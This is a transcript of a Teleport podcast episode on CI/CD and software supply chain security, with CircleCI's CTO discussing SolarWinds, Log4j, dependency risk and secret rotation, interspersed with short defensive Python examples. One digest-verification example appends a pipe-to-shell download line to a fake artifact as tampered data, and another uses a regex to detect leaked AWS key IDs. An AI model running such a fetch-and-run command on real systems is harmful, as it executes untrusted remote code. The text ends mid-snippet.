Securing CI/CD and the Software Supply Chain.
For this 14th episode of Access Control Podcast, a podcast providing practical security advice for startups, Developer Relations Manager at Teleport Ben Arent chats with Rob Zuber. Rob is a seasoned entrepreneur and along his startup journey, he ran into issues with mobile CI/CD. This led him to create Distiller, a CI/CD service focused on mobile devices. The Distiller team later joined forces with CircleCI, and Rob has been CircleCI's CTO for the last 7 years. CircleCI is a service that provides build and deployment infrastructure for modern apps. CircleCI is a hyper-growth startup that also supports many startups.
Key topics on Access Control Podcast: Episode 14 - Securing CI/CD and Supply Chain
- CI/CD stands for continuous integration, continuous deployment.
- With regard to software supply chain problems, as with other similar problems, there's always the question of how long have we known about something versus how long has it been happening.
- Continuous deployment is important for remediation because the length of time to push a deployment impacts the duration of exposure to a given security problem.
- The SolarWinds incident was caused by a compromised build server and involved sophisticated loading of a backdoor into the deployed Orion system.
- Prior to recent security incidents, CI/CD security focused on image and artifact scanning. Securing tokens and build infrastructure has since become a key part of keeping CI/CD secure.
- As companies string together a large number of tools, it's important for them to ask: What is the security model we have here? We'll discuss this in detail in this episode.
Expanding your knowledge on Access Control Podcast: Episode 14 - Securing CI/CD and Supply Chain
- Teleport 9 - Introducing Machine ID
- Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor
- Project Trebuchet: How SolarWinds is Using Open Source to Secure Their Supply Chain
- Teleport Machine ID
- Using Teleport Machine ID with Jenkins
Ben: 00:00:00.531 [music] Welcome to Access Control, a podcast providing practical security advice for startups, advice from people who've been there. Each episode, we'll interview a leader in their field and learn practices and practical tips to secure your org. For today's episode, I'll be talking to Rob Zuber. Rob is a seasoned entrepreneur, and along his startup journey, he ran into issues with mobile CI/CD. This led him to create Distiller, a CI/CD service focused on mobile devices. The Distiller team later joined forces with CircleCI, and Rob has been CircleCI's CTO for the last seven years. CircleCI is a service that provides build and deployment infrastructure for modern apps. And CircleCI is also a hyper-growth startup, but also supports many startups, making Rob the perfect guest for today's episode. Hi, Rob. Thanks for joining us today.
Rob: 00:00:46.859 Thanks for having me. I'm excited to be here.
Defining CI/CD and its evolution over the past 5 years
Ben: 00:00:49.002 All right. To kick things off, I'll start with an easy one. What is CI/CD?
Rob: 00:00:53.403 That's a great question. And it feels easy sometimes, but it's a big story in its own right, so I'll keep it simple. CI/CD, first of all, stands for continuous integration, continuous deployment. Although sometimes we say continuous delivery, continuous deployment. Effectively, continuous integration is the practice of constantly integrating software that multiple members of a team are working on, all of the changes so that you can identify any issues, any conflicts as quickly and early as possible, avoiding late and complicated sort of merges or integrations down the line. And then continuous deployment is really taking that a step further, not just integrating the software, but pushing it out into a production environment or making it available to customers, which is both good validation of the correctness of the software, if you will, but also a great opportunity to get feedback. The sooner you put things in front of your customers, the sooner you can learn if the path that you're on is the right path. So build something really small, put it in front of customers, validate that it's actually useful or valuable to them, and then continue down that path or adjust your path. So both technical correctness and value to customer, the sooner we can learn on both of those fronts, the better off we are.
Ben: 00:02:11.767 Yeah. And then how has it sort of changed over the last 5 years?
Rob: 00:02:15.160 I think in the last 5 years, everything about how we deliver software has changed. So that's fundamentally changed how we build the tooling to support that. Right? So most notably, this is a little bit more than a 5-year arc, but I would say if we go specific to 5 years, 2017, I always say, is the year that Kubernetes won. At the time, coming into 2017, there were, what, five or six different container orchestrators, and everyone was trying to compete in that space, and everyone settled on Kubernetes. And over the course of 2017, everybody else became a wrapper around Kubernetes. But what's interesting is if you go 5 years before that, nobody needed a container orchestrator because no one even knew what a container was. Right? So the way we delivered software 10 years ago in the world of Chef and Puppet and sort of machine configuration changes, it's very different from a post Docker containerized world. And so what we build, how we package it, how we get it into a production environment has all fundamentally changed. And therefore, how we integrate, how we validate, how we push changes out, and deploy it into those environments has changed. Right? So from I'm modifying a binary in an existing machine, and then concerning myself with, "Is the state of that machine correct?" to, from a container perspective, I'm effectively throwing out the machine and replacing it with another one. We tried to do that with baking AMIs back in the day. But basically, the whole process of software delivery has changed as a result of the tooling that we've used underneath it.
Ben: 00:03:47.954 Yeah. I guess it's a real continuation of what pets versus cattle was for infrastructure, but this is also for your code, too.
Rob: 00:03:54.424 Right. And I think it's actually, for all the topics that we want to get into, is a good thing because you have a snapshot of a much bigger piece of the system. So if you're shipping kind of the whole system, you think about it that way. You have the opportunity to validate that the whole system is good as opposed to the single binary that you're putting into an environment that may have changed around you.
When software supply chain problems became mainstream
Ben: 00:04:17.680 Yeah. And then sort of shifting gears, 2020 and 2021 were also the years in which software supply chain became mainstream, leading with the SolarWinds incident, and then there's also the executive order addressing the SBOM. Before we dive too deep into the specifics, why do you think these problems are just starting to appear now?
Rob: 00:04:39.296 Well, I think there's probably two facets to that. Right? There's always the question of how long have we known about something versus how long has it been happening. Some of these things will just be awareness. But also, as we fundamentally shift the ways in which we deliver software, we tend to do that because we want to either simplify or create leverage, whatever that might be. There are drivers for the types of changes that we make. But also every time we change the way we deliver software, we become less skilled at the thing that we're doing. Right? We have less awareness, less understanding of how software delivery works because we've just fundamentally changed the model of software delivery. And so that creates new openings. Right? I mean, security is often about awareness of what's happening, your ability to reason about the different kinds of opportunities and different kinds of surfaces that are exposed in how you're delivering software.
Rob: 00:05:40.306 And so as we change the ways in which we deliver software, we create new opportunities. Right? So I would say that is a real factor. And I said there was two, but I'll add a third, which is the whole concept of supply chain. The reason that the supply chain is probably more exposed now is — for me, I'd call it a 20-year arc. I often use that, but that's just the time I've been in the business. We've gone from writing almost every line of code that we are ultimately putting into a production environment to writing a very, very small fraction of that code, from even building out the systems, the machines — 20 years ago, we were all building our own data centers — to clicking a button, getting someone else's AMI on top of a machine - I couldn't even tell you where that machine is — to then taking a framework off the shelf, some open source framework that I put this tiny little fragment of code on top of, which is mostly me gluing together a bunch of people's open source libraries.
Rob: 00:06:37.515 So the opportunities and the exposures are very much not in my own software. Of course there's exposures in my software, but so much of it is in stuff that other people have written that I'm taking on good faith in a lot of circumstances. I think just the complexity is the enemy of understanding, usually. And so that complexity creates opportunity for things I can't see or understand, and that's an opportunity for security vulnerabilities.
Ben: 00:07:05.161 Yeah. And I guess that's kind of where the SBOM, which is the software bill of materials — I don't know if you can explain sort of how that's an important part of this supply chain?
Rob: 00:07:15.659 It's a great question. Right? Do I even understand all of the things that are rolling up into the software that I'm ultimately delivering? It's interesting for me. As a bit of backstory, I spent my first year out of college working in a factory, and we were building hardware, computer hardware. And so we had bills of material, I guess that's how you would pluralize that. So we would have that for every — because you needed to know —
Ben: 00:07:41.888 [inaudible]. Yeah.
Rob: 00:07:42.603 —this chip goes in this spot and you had to order the parts and all that kind of stuff. It was a very different, much more physical perspective of that. But the concept that you would build something without knowing all of the component pieces just wouldn't work. Right? Because you actually had these pieces coming in and out of the building basically on trucks versus in the world of software, so many of these components are imported without people paying a lot of attention. In particular, you end up with transitive dependencies. Right? So I am depending on a library, and that library is bringing in a whole bunch of other libraries, and I'm not necessarily paying attention to that. Right? I'm like, "Oh, you have a Facebook plugin. I will take your Facebook plugin, and now I can go work with Facebook." But I'm not considering, until the CVE start arriving, all of the other tools that you used to build that. Right? You see this because you have a conflict between two different transitive dependencies.
Rob: 00:08:40.326 One of my libraries imports this version of this, of, let's say, Log4j just for fun, because that's going to come up. Another one imports this other version, and they're not even compatible with each other. So as a developer, I'm frustrated because I have to go wrestle with these dependency issues. But I don't think until recently, because we've had enough issues, enough visibility into those, that people were really paying attention to the depths of these dependency trees and what they were bringing into their environment, again, just without even paying attention to who wrote this. Where did this even come from? I think left-pad is another great example. For anyone who doesn't know, it's an NPM module that got pulled by a developer who decided they just didn't want to work on it anymore and basically broke tons of node products because people didn't even — it's so easy to bring this stuff in — I guess is the best way of looking at it. Right?
Rob: 00:09:34.294 When you have a — going back to the - it's not really a metaphor, I guess it's a metaphor the other way - the physical bill of materials, you pay attention to the price and the supplier and the shipping time and all these things of every single component, and you try to minimize your exposure. But in software, it's so easy to just say, "Oh, someone wrote this thing. Someone wrote that thing. No problem. I'll just integrate them," and you expose yourself to that risk without — I think we just haven't had a history of paying attention to that.
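To make the transitive-dependency point concrete, here is a minimal Python sketch. It assumes a hypothetical dependency map (the package names and the `DIRECT_DEPS` structure are made up for illustration, not taken from any real package manager) and shows how a small list of direct imports expands into a larger set once everything they pull in is counted.

```python
from collections import deque

# Hypothetical dependency map: package -> packages it imports directly.
DIRECT_DEPS = {
    "my-app": ["social-plugin", "web-framework"],
    "social-plugin": ["http-client", "logging-lib"],
    "web-framework": ["logging-lib", "string-utils"],
    "http-client": [],
    "logging-lib": [],
    "string-utils": [],
}


def transitive_dependencies(root, graph):
    """Return every package reachable from root, excluding root itself."""
    seen = set()
    queue = deque(graph.get(root, []))
    while queue:
        pkg = queue.popleft()
        if pkg in seen:
            continue
        seen.add(pkg)
        queue.extend(graph.get(pkg, []))
    return sorted(seen)


def introduced_by(target, root, graph):
    """List the direct dependencies of root that pull in target."""
    return sorted(
        dep
        for dep in graph.get(root, [])
        if dep == target or target in transitive_dependencies(dep, graph)
    )


if __name__ == "__main__":
    print(transitive_dependencies("my-app", DIRECT_DEPS))
    print(introduced_by("logging-lib", "my-app", DIRECT_DEPS))
```

In this toy graph the application declares two dependencies but ships five, and the logging library arrives through both of them. A software bill of materials is meant to make that kind of inventory explicit.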
Why continuous deployment counts for remediation
Ben: 00:10:00.238 Yeah. And I think once you've had the risk, there's all these sort of possible attacks. Can you sort of explain why continuous deployment is important for remediation?
Rob: 00:10:08.268 I think this is true not just in security, but everywhere. Failure is going to happen in some form or another. Right? Your failure might be you're exposed to a newly identified issue from a security perspective, a CVE or whatever in your stack or something you've built has created an exposure that you need to fix. And if you are not in a position to quickly update, the issue is now known. And so the attack window is from the point that it's been realized and published to the point that you've been able to remediate. Right? And often if you're the provider, let's say you're the — I'm going to keep using Log4j, but I guess the Apache Foundation, there's been notification, responsible disclosure, someone has gone and said, "Hey, we found this issue. You should probably fix it." But again, because it's supply chain, they didn't contact us. Right? We weren't actually particularly exposed to the Log4j issues.
Rob: 00:11:08.723 But no one contacted us and said, "Hey, by the way, this issue is going to come out before we actually notify publicly. You should go fix it." So we find out at the point that it's been made public. Now it's public and everyone says, "Oh, wow, there's this open window for this attack vector." So how much time do we have or how long does it take us to update all of our systems and remediate that? And if we have a continuously delivered meaning always ready to go to production system, and in our case, basically as soon as something is good, we push it into production, then that window is really, really short. Right? If we can say, "Oh, we upgraded this library," run the test and push it to production, for us, that's measured in minutes. And so good luck in those ensuing minutes finding a way to take advantage of that in our platform. If you're operating in the world that many of us were operating in 10 years ago, and probably some people still are, where it's three months to push a deployment to your production environment, that's a three-month exposure to that problem.
Rob: 00:12:10.362 And so now you're not going to accept the three-month exposure. What you're going to do is scramble and try to put together some bespoke process to patch all of your systems, which might solve the Log4j problem, if I continue as an example, but you're going to expose yourself to other production issues. Right? We just made a bunch of changes. We don't really have a good way of testing it. We're skipping the test cycle because it's so important that we get this out. So it's really having the confidence and the ability to upgrade at any given moment and know that that upgrade is good. And so for us, we're shipping hundreds of times a week, adding in another shipment is nothing.
Ben: 00:12:46.406 And then are there any cases beyond just blue-green deployments for urgent security fixes? What sort of approaches do you see for things that should go out across the whole fleet immediately?
Rob: 00:12:56.527 The tooling to mitigate any other risk that's introduced is, again, not necessarily specific to this. And I think when you ask about being able to ship immediately, we kind of ship everything immediately. So the tools that we use are the same tools. And when you're using the same tools, you have a lot of confidence in those tools. We use them all day, every day to get software into production. Then doing something new is just doing the same thing. And so when we think about blue-green, it's really about mitigating risk. Right? It's, I've introduced something new. I cut traffic over from one environment to the other: say the old one is green and the new one is blue. You kind of alternate back and forth. So I can cut over traffic. If something goes wrong, I take it back. There's many other tools for deployment that you can use for that. Feature flags are effective in introducing stuff, but being able to turn it back off. We use something called release orchestration, which is routing traffic to smaller subsets versus just a full cutover like a blue-green model. All of those approaches are viable. And any of those practices are going to give you the comfort and confidence to just put stuff out, know that it's good, and if something does go wrong, that you've managed the risk and you can pull it back.
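The difference between a full cutover and routing traffic to a smaller subset can be sketched in a few lines of Python. This is an illustrative sketch only, not a description of CircleCI's release orchestration: the function names and the idea of bucketing on a hash of a request key are assumptions made for the example.

```python
import hashlib


def bucket_for(request_key: str) -> int:
    """Map a stable key (for example a user ID) to a bucket from 0 to 99."""
    digest = hashlib.sha256(request_key.encode("utf-8")).digest()
    return int.from_bytes(digest[:4], "big") % 100


def choose_version(request_key: str, rollout_percent: int) -> str:
    """Route a stable slice of traffic to the new version.

    rollout_percent=0 sends everyone to the old version (a full rollback);
    rollout_percent=100 is a complete cutover, as in a blue-green switch.
    """
    if not 0 <= rollout_percent <= 100:
        raise ValueError("rollout_percent must be between 0 and 100")
    return "new" if bucket_for(request_key) < rollout_percent else "old"


if __name__ == "__main__":
    users = [f"user-{i}" for i in range(1000)]
    on_new = sum(choose_version(u, 10) == "new" for u in users)
    print(f"{on_new} of {len(users)} users routed to the new version")
```

Because the bucket depends only on the key, a given user stays on the same side as the percentage grows, and setting the percentage back to zero pulls the change back for everyone.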
The SolarWinds Orion SUNBURST attack
Ben: 00:14:08.885 Yeah. That's a great answer. Another big one, which was the SolarWinds incident, was caused by a compromised build server. And then there was kind of sophisticated loading of a backdoor into the deployed Orion system. And I think FireEye has an excellent write-up that I'll put in the show notes. But I wonder if you can break down some ways in which people can sort of strengthen the build server? Also, I think the thing that's interesting with SolarWinds is it wasn't compromised via source code, but instead from a compiled asset.
Rob: 00:14:37.908 Look, that's super complex. There are a large number of things that happen in there to say, "Oh, do this thing differently and you'll be better off." But the reality is it's ultimately about understanding the thing that you put in versus the thing that came out. And so there are lots of steps along the way that you can take there, I think. If you're pulling in binary components, as you're describing, knowing the source of those, being able to — I'll say simple things like signatures, understanding signatures. There have been much simpler attacks that were about just pulling source off the internet and executing it without validating against the signature. Right? Something relatively straightforward. So let's start with the relatively straightforward things. As we talk about the fact that there's always going to be something, when you have state-sponsored actors who are investing years to try to find ways into your system, yes, you can improve the basics. At some point there's going to be some exposure, so you have to think about dealing with those exposures. Right?
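One of the "relatively straightforward things" can be sketched as a digest check before a downloaded component is used. Note the swap: this is a SHA-256 comparison against a pinned value, which is simpler than verifying a cryptographic signature and only proves that the bytes match what was pinned through some trusted channel. The function names are hypothetical.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def verify_artifact(data: bytes, expected_sha256: str) -> bytes:
    """Return data only if its SHA-256 digest matches the pinned value."""
    actual = sha256_hex(data)
    # compare_digest avoids leaking how many leading characters matched.
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ValueError(
            f"digest mismatch: expected {expected_sha256}, got {actual}"
        )
    return data


if __name__ == "__main__":
    artifact = b"#!/bin/sh\necho installing\n"
    pinned = sha256_hex(artifact)  # in practice, pinned ahead of time
    verify_artifact(artifact, pinned)
    try:
        verify_artifact(artifact + b"curl http://example.invalid | sh\n", pinned)
    except ValueError as err:
        print("refusing to run:", err)
```

The point is where the check sits: the build refuses to continue before the unverified bytes are ever executed.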
Rob: 00:15:40.311 I think this is where a lot of zero trust sort of models come from is the assumption that someone is inside the system. Okay. Now how do I get the system to work anyway? How do I become resilient to that? Right? I think concepts like single-use tokens are really valuable for that. So if a token has been taken and used, it's identified to me that it's already been used. So I get some indication, at least, that I don't continue down the path. Again, there's multiple points within that system, but knowing that the thing that came into your system is the one that you expected often ties to signing and knowing what the source was. Right? And I think knowing, okay, we're using these secrets, how long do the — there're some pretty standard practices around rotation, but it gets even better as you get to sort of things like single-use tokens again. Anything that's going to give you a hint that something has changed or something is off, even if you don't know what it was, as long as that's the point where you say, "You know what? We're not going to let this continue."
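The single-use token idea can be illustrated with a small in-memory sketch. The class and its return values are hypothetical, and a real system would persist state, expire tokens, and store hashes rather than raw values. What matters is the third outcome: a token that was valid once and shows up again is a signal worth stopping on.

```python
import secrets


class SingleUseTokens:
    """Issue tokens that can be redeemed exactly once."""

    def __init__(self):
        self._unused = set()
        self._used = set()

    def issue(self) -> str:
        token = secrets.token_urlsafe(32)
        self._unused.add(token)
        return token

    def redeem(self, token: str) -> str:
        """Return "ok", "reused", or "unknown"."""
        if token in self._unused:
            self._unused.remove(token)
            self._used.add(token)
            return "ok"
        if token in self._used:
            # Someone already spent this token: halt and investigate.
            return "reused"
        return "unknown"


if __name__ == "__main__":
    tokens = SingleUseTokens()
    t = tokens.issue()
    print(tokens.redeem(t))  # first use succeeds
    print(tokens.redeem(t))  # second use is flagged
```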
Rob: 00:16:39.577 And again, if you go into the details, the amount of effort that was put into preventing those binaries from behaving in any unexpected way during the build process and sort of only turning on once they got into a production environment, that was a lot of energy. You have to think about how your system is constructed in order to be able to say, "Oh, this is the way that this would be noticeable," or "This is the way that this would be noticeable." But then how it behaves in a production environment is something else that you can pay attention to. Right? If things are making remote calls out to systems that they shouldn't be. I think a lot of us spend a lot of energy preventing inbound calls, but don't pay attention to the outbound calls. But if you have a nefarious actor inside your system, the outbound calls are going to be really interesting.
Ben: 00:17:27.437 Actually, yeah, Trevor Rosen of SolarWinds has a great presentation on how they secured things after the hack. And I think in his miscellaneous details, he says that their build servers limit outbound connections to only GitHub. On a sort of follow-up question, what are your thoughts around perimeter security?
Rob: 00:17:43.905 Perimeter security is interesting. We're sort of reflecting on perimeter security and saying, "We can't just hold people at the perimeter." Right? What do we need to do to have defense in depth? What do we need to do to make sure that at every layer there are additional levels of protection? That doesn't mean we should have a Swiss cheese perimeter, but we shouldn't assume that no one's going to get through. So then what's interesting actually about that is it's more about, again, outbound. Not I'm blocking people from getting into my system, but rather I'm using the complete perspective of the system. Something is generating traffic to a destination that I wouldn't have expected. Blocking it is interesting, but identifying it is even more interesting. Because if I just block outbound, again, in the case of the SolarWinds thing, if I block outbound traffic, but that thing still is embedded and gets out into my production systems, then it's my production system problem that's different. And that's not trying to connect to GitHub; it's trying to connect to wherever it's reporting information out to or whatever. Right?
Rob: 00:18:40.766 So I think the basic assumption that the perimeter on its own isn't good enough and that it's not just that I'm blocking, but I'm paying attention to every behavior. It might be system calls. It might be network calls. What's happening inside of this environment and did I expect it is a great way to identify anything out of the ordinary. And that's a really weird and broad statement, but if something's happening in my build that I didn't expect, I want to pay attention to that.
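Identifying unexpected outbound traffic, rather than only blocking it, can be sketched as follows. Everything here is an assumption for illustration: the allowlist containing only `github.com`, the `(process, host)` record shape, and the function name. Real telemetry would come from a firewall, proxy, or system-call tracing.

```python
from collections import Counter

# Assumption: the only destination this build is expected to reach.
ALLOWED_HOSTS = frozenset({"github.com"})


def unexpected_destinations(connections, allowed=ALLOWED_HOSTS):
    """Count outbound connections to hosts that are not on the allowlist.

    connections is an iterable of (process_name, host) pairs.
    Matching is exact, so subdomains must be listed explicitly.
    """
    counts = Counter()
    for process, host in connections:
        normalized = host.lower().rstrip(".")
        if normalized not in allowed:
            counts[(process, normalized)] += 1
    return dict(counts)


if __name__ == "__main__":
    observed = [
        ("git", "github.com"),
        ("compiler-plugin", "telemetry.example.invalid"),
        ("compiler-plugin", "telemetry.example.invalid"),
    ]
    for (process, host), n in unexpected_destinations(observed).items():
        print(f"{process} made {n} unexpected connection(s) to {host}")
```

Recording which process made the call is the part that turns a blocked packet into something a person can investigate.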
Ben: 00:19:10.247 Yeah. And I think that's the interesting thing about the Log4j is basically it would communicate to any LDAP server on the internet.
Rob: 00:19:16.605 Well, not just communicate with it, but fetch code from it and execute the code. I mean, when you say it out loud, it sounds ridiculous, but if you were writing Java software in the late '90s, early 2000s, I think it sounded amazing. Right? We were trying to build great abstractions. We were trying to make dynamic systems. And probably the mindset or the mind space of even the system we were building and how it was configured and what you might do with that was very, very different from how it's now being applied today. Yes. To say it out loud, you're like, "Why would I ever allow one of my libraries to execute arbitrary code?" That sounds like a terrible idea from the get-go. But if you take a perspective with a little bit more empathy and throw yourself back into that time and space, it might make a ton of sense. I mean, this was a time when we were writing — I don't remember the names, but we did a lot of object serialization over the network and stuff like that. Those felt like good practices, and we were still trying to figure out how to do distributed systems. And so it's an interesting point to say, what other tools are we using that were conceived in that era where these types of approaches would seem sensible or reasonable? Right? I think it's always a failure of imagination to look at one issue and conclude that it's constrained to that issue. You know what I mean? Yes, the Log4j issue is a big, scary issue, and we should all deal with upgrading our libraries and whatever, but it's more interesting to ask, what was the mindset and what else did we build when we had that mindset? And are those things still out there? And when is that zero day CVE whatever coming down? And can we prevent it?
Ben: 00:20:59.560 Yeah. And I guess that goes back to your containerization, rapid delivery, and sort of Kubernetes, people who haven't quite got there in their organization yet. There's all these other benefits that come with it just by updating their processes that now, you can probably make continuous deployment easier.
Rob: 00:21:15.346 Yeah. Absolutely. I think that the tools that we now have made all of these capabilities easier. This is only audio, but I'm going to air quote, "easier". We've taken a bunch of complexity incidentally in order to solve other complexities. Right? So we have to pay attention to where the complexity is going. And as I said earlier, complexity is the enemy of understanding. Right? So the more we can simplify our systems, the better off we're going to be. Those tools have allowed us to do things that we couldn't do before. So that's great. And give us the capability to say, "Well, yep, there's another security issue. We probably could have seen that one coming. Now it's here and we're going to upgrade this library and click this button and then we're good." Right? It's going to be solved in our environment and we can go back to work versus the panic. Right? The panic of, oh my goodness, where is this thing in our system? How on Earth are we going to find all the places where it exists in our system? And how are we going to fix that at the rate that we discover software issues in general? Especially speaking of the stack of everyone else's software that we're using, if it's not automated to just deal with it, we would spend all of our time just fixing and updating dependencies where people are finding security issues. Right? So I think having that tooling is just an opportunity to then stay focused on the work you're trying to get done.
The current state of image scanning tech
Ben: 00:22:42.199 And then I guess zooming out of it, before all of these sort of more recent incidents, I remember CI/CD's main focus was around sort of image and artifact scanning. That was sort of the security bolt-on feature. And a lot has sort of changed, I think, in the last five years at a few companies. But what's the current state of image scanning tech? And what do you see coming next?
Rob: 00:23:01.290 Kind of to that point, image scanning, library scanning, dependency checking, that's the table stakes, if you will, of security. And it's certainly critical. I mean, if you're still shipping software that has year-old known security issues, then you're not in a great place. But it's not everything. Right? The bar is being raised in terms of attackers. Right? I guess security is always a bit of a cat and mouse game. Every time we build a decent set of defenses, someone else is going to try to build a better set of, I don't know, attacks, I guess. Right? So, yes, you should absolutely be scanning because those known vulnerabilities, everybody knows how to take advantage of them. And if you're putting that out in production, you get the Equifaxes of the world. Right? Just known issues that are sitting out in production, and people take advantage of them.
Rob: 00:23:56.186 But beyond that, some of the things we talked about already, like ensuring that everything you're using from the outside is trusted and known back to the source. Right? So how can you enforce that in terms of basic things like checking signatures, checking sources, checking if anything is leaving the system that you didn't expect to be leaving the system? So constraining within your environment. How you even manage within that. I mean, this is probably very specific to us because we run multi-tenancy, but how we isolate environments within the platform is something we spend a lot of time on (maybe that's not obvious), ensuring that each tenant is basically isolated to their own environment. And then we recently launched something called IP ranges, which is really about ensuring that if our system is talking to your system, you know the source, you know that it's your build, not someone else's build that's connecting in.
Rob: 00:24:50.811 As we work with more and more — it's not even necessarily tied to CI and CD specifically. But as we all work with more and more third-party vendors, whether it's just third-party services, we tend to be stitching together platforms versus entirely building platforms, again, ensuring that we truly have the trust of that provider. Right? We know that we're still getting the link to the right source or destination that we know that is the provider that we're signed up to work with, not someone else who's trying to step in the middle and capture things. I think it's almost gotten too easy.
Ensuring trust between machines
Ben: 00:25:27.056 Yeah. And what have you seen, well, for this sort of, let's say, machine to machine communication? How do you ensure trust between two machines, one, I guess another vendor and your own one?
Rob: 00:25:37.758 I don't think that the practices have changed significantly in terms of whether it's addressing, whether it's certificate exchange, OAuth token models, whatever it might be. I think that what has changed is — and maybe this is just my time in the industry — I don't think we're as paranoid as we used to be, and I think we need to get as paranoid as we used to be. There was a point, I guess, a little bit post wouldn't it be cool if we could do remote procedure invocation or remote method invocation. That's what I was trying to think of earlier in Java. Right? That sounded great. And then at some point we said, "Wait a second, we're calling methods of another machine. How do we have trust in that machine?" And we spent a lot of time thinking about that. And now, I think we assume that whatever provider we're using has thought it through. Oh, okay. They have OAuth, and OAuth is known to work. Therefore, this is going to be great. Right?
Rob: 00:26:32.094 But it's so easy to string together a very large number of tools. And I think it's important that as we're doing that, we look at it and say, "Okay. What is the security model that we have here? How can we think about that security model? And how well does that work with our system? Where are the opportunities? Where are the exposures here?" And it might just be we're making sure that we're using both client-side and server-side certificates, I mean, random examples. But whatever it might be, are we really consciously thinking about that? I mean, basically every quarter, we have a third party come and do pen testing of our system, and we target them in different areas. But some folks have red teams internally to look at, okay, if I was on the outside with limited but decent knowledge of how the system works, what approaches would I have? Right? And I just think all of that is a mindset that sometimes as developers, it's easy to gloss over. I got a lot going on. It would be really great if I could just use this third party and use this other library because it saves me time, and that is ideal. Right? We want to ship value to customers, but just taking that minute, the thought experiment, like what are the boundaries of where this is secured and where it's not? And how confident am I in this? I think we've just lost a little bit of that paranoia, and some of these events will probably bring it back.
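Using certificates on both the client and the server side is usually called mutual TLS. As a rough sketch with Python's standard `ssl` module, the two contexts might be set up as below. The function names and the optional file-path parameters are hypothetical; in a real deployment the paths would point at a certificate, private key, and private CA that you control.

```python
import ssl


def make_server_context(cert_file=None, key_file=None, client_ca_file=None):
    """Server side: present a certificate and require one from the client."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # Reject any client that does not present a certificate we can verify.
    ctx.verify_mode = ssl.CERT_REQUIRED
    if cert_file:
        ctx.load_cert_chain(certfile=cert_file, keyfile=key_file)
    if client_ca_file:
        # Trust only the CA that issues client certificates.
        ctx.load_verify_locations(cafile=client_ca_file)
    return ctx


def make_client_context(cert_file=None, key_file=None, server_ca_file=None):
    """Client side: verify the server and present our own certificate."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=server_ca_file)
    if cert_file:
        ctx.load_cert_chain(certfile=cert_file, keyfile=key_file)
    return ctx


if __name__ == "__main__":
    server = make_server_context()
    client = make_client_context()
    print(server.verify_mode, client.verify_mode, client.check_hostname)
```

The server context is built without the system trust store on purpose, so that only certificates issued by the CA you load are accepted from clients.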
Ben: 00:27:56.089 I know. I mean, I used to run an exception tracking service, and in the early days, people would send in their stack trace. You'd get the environment variables, which is kind of an example. You don't know which third party is dumping whatever to you.
Rob: 00:28:10.086 Exactly. We take these libraries often not really sure what they're doing. And so then saying, "Okay. Well, if I had a library and it had access to everything in my system, how could I make that okay?" Right? It's an interesting question to ask. How can I ensure that all these tokens that exist in my build environment are useless for anything else? It's a great question to ask. Right? And then say, "Okay. Well, this is how I'm going to build it." And then that gives you that opportunity to then not even worry about it. Right? Versus, "Oh, we accidentally put a token in source control." I mean, this is a thing that happens all the time. I think there's entire scanners dedicated to looking for the AWS formatted tokens in GitHub or whatever because people do that by accident all the time. And so the question is, well, how do I make it so that token doesn't really matter? Right? How can I have this stuff — and then once I've done it, yes, you can remove it from GitHub, but I promise you, someone has already found it. So how do I make it so I can rotate those things very quickly?
Rob: 00:29:08.190 We talked about changing source, right, but all of your token management should be in the same bucket, meaning, oops, we leaked a token, click, that's irrelevant. Right? Versus we've leaked it, and now everyone in engineering has to stop their work so we can go figure out how to deal with this.
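As an illustration of the scanners Rob mentions, here is a minimal sketch in Python. It assumes the widely used pattern for AWS access key IDs (the prefix `AKIA` for long-lived keys or `ASIA` for temporary ones, followed by 16 uppercase alphanumerics). The function name `find_aws_key_ids` and the sample text are hypothetical, and real scanners cover many more secret formats than this.

```python
import re

# Commonly used pattern for AWS access key IDs: a 4-letter prefix
# followed by 16 uppercase letters or digits (20 characters total).
AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")


def find_aws_key_ids(text):
    """Return (line_number, key_id) pairs for every candidate key ID."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in AWS_KEY_ID.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits


# AKIAIOSFODNN7EXAMPLE is the placeholder key ID used in AWS documentation.
sample = (
    "region = us-east-1\n"
    "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
    "comment = nothing to see here\n"
)
print(find_aws_key_ids(sample))  # [(2, 'AKIAIOSFODNN7EXAMPLE')]
```

A scanner like this only tells you a key has leaked. As Rob says, the key should be treated as already found, so the useful follow-up is fast rotation rather than deletion from history.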
Ben: 00:29:25.255 Pulling this back to DevOps or the dev stack: just giving developers tools to make that automation easier, so they don't have to file a ticket or do some scary process where no one wants to rotate the token because they're not quite sure where it is. You just make it sort of part of your day to day.
Rob: 00:29:38.649 Right. And then you get to the point where you're rotating them so often, it doesn't even matter. I think that whole — you mentioned DevOps, that whole notion of if something is painful, just do it more until you've gotten to the point where it's really easy to do. It really helps reduce your exposure because things are going to go wrong. Some piece of software you're using is going to have an error. Someone is accidentally going to put a token in a place where it's public. This happens. You can't just stand around yelling at people until they stop doing it. You're going to stress them out. They're going to probably publish more of them. Right? There's no human solution to that. So how do you build a system that's resilient to those things? And it only happens when you accept that these things are going to happen, these issues are going to occur. What we need is tools that allow us to fix them.
Best practices for securing secrets
Ben: 00:30:23.574 Yeah. And then have you got any other best practices of dealing and sort of securing secrets, I guess, both internally and for your customers?
Rob: 00:30:30.954 We provide tools within our environment for managing secrets within the build. We also integrate some of the tools from AWS to do machine level authentication so that you don't have as many powerful secrets basically floating around in the first place. I think internally, probably nothing surprising, but again, I refer to single-use tokens, rotating things using tools like Vault from HashiCorp. It's one of these areas where people have done great work to get us good tools, and so we try to use those versus come up with our own systems. There's a few things that are specific to how stuff gets run through a build, but overall, in terms of how we look at secrets, again, be able to rotate them and get to the point where rotating is happening automatically and then your surface area is just greatly reduced.
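To make the idea of short-lived, easily rotated tokens concrete, here is a minimal Python sketch. It is not how CircleCI or Vault issue credentials. It is a generic HMAC-signed token with an expiry time, and the names `issue_token` and `verify_token`, the payload layout, and the keys are all assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import time


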